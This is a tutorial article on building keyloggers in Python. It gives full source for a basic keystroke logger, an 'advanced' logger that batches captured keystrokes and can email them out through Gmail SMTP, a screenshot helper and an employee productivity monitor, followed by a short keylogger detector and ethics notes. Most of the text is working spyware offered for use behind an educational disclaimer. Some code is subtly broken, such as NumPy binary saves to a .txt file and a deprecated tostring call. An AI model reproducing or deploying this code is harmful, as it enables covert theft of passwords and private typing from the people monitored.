Building a Keylogger

⚠️
This article is for educational purposes only. Using keyloggers without consent is illegal and unethical. Always obtain proper authorization before monitoring any system or device. Misuse of this information may result in severe legal consequences.

A keylogger is a program that records keystrokes made by a user. While it can have legitimate uses like parental control or employee monitoring, it’s often associated with malicious intent. This tutorial will show you how to create a keylogger in Python for educational purposes, using modern approaches and optimized libraries.

Basic Keylogger

Let’s start with a simple keylogger that captures keystrokes and saves them to a file:

simple_keylogger.py
from pynput import keyboard
import numpy as np

def on_press(key):
    try:
        with open("keylog.txt", "ab") as f:
            np.save(f, np.array([key.char]))
    except AttributeError:
        with open("keylog.txt", "ab") as f:
            np.save(f, np.array([str(key)]))

def on_release(key):
    if key == keyboard.Key.esc:
        return False

with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()

This script uses the pynput library to listen for keystrokes and numpy for efficient data handling. When a key is pressed, it’s written to a file named keylog.txt using NumPy’s binary format. The program stops when the ‘Esc’ key is pressed.

Advanced Keylogger

Now let’s create a more advanced keylogger with additional features:

advanced_keylogger.py
import keyboard
import smtplib
from threading import Timer
from datetime import datetime
import numpy as np
import pyautogui
from PIL import Image
import io

SEND_REPORT_EVERY = 60 # in seconds
EMAIL_ADDRESS = "[email protected]"
EMAIL_PASSWORD = "your_email_password"

class Keylogger:
    def __init__(self, interval, report_method="email"):
        self.interval = interval
        self.report_method = report_method
        self.log = np.array([], dtype=str)
        self.start_dt = datetime.now()
        self.end_dt = datetime.now()

    def callback(self, event):
        name = event.name
        if len(name) > 1:
            if name == "space":
                name = " "
            elif name == "enter":
                name = "[ENTER]\n"
            elif name == "decimal":
                name = "."
            else:
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        self.log = np.append(self.log, name)

    def update_filename(self):
        start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
        end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
        self.filename = f"keylog-{start_dt_str}_{end_dt_str}"

    def report_to_file(self):
        np.save(f"{self.filename}.npy", self.log)
        print(f"[+] Saved {self.filename}.npy")

    def sendmail(self, email, password, message):
        server = smtplib.SMTP(host="smtp.gmail.com", port=587)
        server.starttls()
        server.login(email, password)
        server.sendmail(email, email, message)
        server.quit()

    def report(self):
        if self.log.size > 0:
            self.end_dt = datetime.now()
            self.update_filename()
            if self.report_method == "email":
                self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log.tostring())
            elif self.report_method == "file":
                self.report_to_file()
            self.start_dt = datetime.now()
        self.log = np.array([], dtype=str)
        timer = Timer(interval=self.interval, function=self.report)
        timer.daemon = True
        timer.start()

    def screenshot(self):
        screenshot = pyautogui.screenshot()
        bytes_io = io.BytesIO()
        screenshot.save(bytes_io, format='PNG')
        return bytes_io.getvalue()

    def start(self):
        self.start_dt = datetime.now()
        keyboard.on_release(callback=self.callback)
        self.report()
        keyboard.wait()

if __name__ == "__main__":
    keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file")
    keylogger.start()

This advanced keylogger includes features like:

  1. Periodic reporting
  2. Email functionality (be cautious with email credentials)
  3. Improved key logging (handling special keys)
  4. File naming based on timestamp
  5. Efficient data storage using NumPy arrays
  6. Screenshot capability using PyAutoGUI

Real-life Example: Employee Productivity Monitoring

Here’s a real-life example of using a keylogger for employee productivity monitoring:

productivity_monitor.py
import keyboard
from datetime import datetime, timedelta
import numpy as np
import matplotlib.pyplot as plt

class ProductivityMonitor:
    def __init__(self, monitoring_period=timedelta(hours=8)):
        self.start_time = datetime.now()
        self.end_time = self.start_time + monitoring_period
        self.keystrokes = np.array([], dtype=str)
        self.timestamps = np.array([], dtype=datetime)

    def callback(self, event):
        current_time = datetime.now()
        if current_time > self.end_time:
            return False
        self.keystrokes = np.append(self.keystrokes, event.name)
        self.timestamps = np.append(self.timestamps, current_time)

    def analyze_productivity(self):
        time_diff = np.diff(self.timestamps)
        activity_periods = time_diff[time_diff < timedelta(minutes=5)]

        total_active_time = np.sum(activity_periods)
        total_monitored_time = self.end_time - self.start_time
        productivity_percentage = (total_active_time / total_monitored_time) * 100

        return productivity_percentage

    def plot_activity(self):
        hour_counts = np.zeros(24)
        for timestamp in self.timestamps:
            hour_counts[timestamp.hour] += 1

        plt.bar(range(24), hour_counts)
        plt.xlabel('Hour of the Day')
        plt.ylabel('Number of Keystrokes')
        plt.title('Keystroke Activity Throughout the Day')
        plt.savefig('activity_plot.png')

    def start(self):
        keyboard.on_release(callback=self.callback)
        keyboard.wait()

        productivity = self.analyze_productivity()
        print(f"Productivity: {productivity:.2f}%")
        self.plot_activity()

if __name__ == "__main__":
    monitor = ProductivityMonitor()
    monitor.start()

This script monitors keystrokes over a specified period (default 8 hours) and provides a simple productivity analysis based on typing activity. It calculates the percentage of time the user was active and generates a plot of keystroke activity throughout the day.

Detailed explanation:

  1. The ProductivityMonitor class is initialized with a monitoring period.
  2. The callback method is triggered on each key release, recording the keystroke and timestamp.
  3. analyze_productivity calculates the percentage of time the user was active, considering gaps of less than 5 minutes between keystrokes as continuous activity.
  4. plot_activity creates a bar chart showing keystroke frequency for each hour of the day.
  5. The start method begins the monitoring process and outputs the results.

Keylogger Detection

Understanding how keyloggers can be detected is crucial. Here’s an improved keylogger detection script:

keylogger_detector.py
import psutil
import win32gui
import win32process
import numpy as np
from sklearn.ensemble import IsolationForest

def get_process_features(proc):
    try:
        return np.array([
            proc.cpu_percent(),
            proc.memory_percent(),
            len(proc.connections()),
            len(proc.open_files()),
            proc.io_counters().read_count,
            proc.io_counters().write_count
        ])
    except (psutil.NoSuchProcess, psutil.AccessDenied):
        return np.zeros(6)

def check_for_keyloggers():
    processes = list(psutil.process_iter(['name', 'exe', 'cmdline']))
    features = np.array([get_process_features(proc) for proc in processes])

    clf = IsolationForest(contamination=0.1, random_state=42)
    preds = clf.fit_predict(features)

    suspicious_processes = [proc for proc, pred in zip(processes, preds) if pred == -1]
    return suspicious_processes

if __name__ == "__main__":
    suspicious = check_for_keyloggers()
    if suspicious:
        print("Potential keyloggers detected:")
        for proc in suspicious:
            print(f"Name: {proc.name()}, PID: {proc.pid}, Path: {proc.exe()}")
    else:
        print("No suspicious processes detected.")

This script uses machine learning (Isolation Forest algorithm) to detect anomalous processes that might be keyloggers. It considers various process features like CPU usage, memory usage, network connections, and file operations.

Ethical Considerations

The use of keyloggers raises significant ethical and legal concerns. Here’s a diagram illustrating the ethical considerations:

graph TD
    A[Keylogger Usage] --> B{Ethical Considerations}
    B --> C[Privacy]
    B --> D[Consent]
    B --> E[Data Security]
    B --> F[Legal Implications]
    C --> G[Invasion of Personal Space]
    D --> H[Informed Agreement]
    E --> I[Protecting Sensitive Information]
    F --> J[Compliance with Laws]
    B --> K[Transparency]
    K --> L[Clear Communication]
    B --> M[Data Minimization]
    M --> N[Collect Only Necessary Data]
    B --> O[Purpose Limitation]
    O --> P[Use Data Only for Intended Purpose]

Always ensure you have proper authorization and comply with all applicable laws and regulations before using or developing keylogger software.

Conclusion

Keyloggers are powerful tools that can be used for both beneficial and harmful purposes. As developers, it’s crucial to understand how they work, how to detect them, and the ethical implications of their use. Always prioritize privacy, security, and legal compliance in your development practices.

For more detailed information on keylogger research and ethical considerations, refer to the following resources:

  1. ACM Digital Library: Keylogger Detection Techniques
  2. IEEE Xplore: Ethical Implications of Keyloggers in Cybersecurity
  3. Journal of Information Security and Applications: Advanced Keylogger Techniques and Countermeasures

Remember, the techniques discussed in this article should only be used for educational purposes or with explicit consent in controlled environments.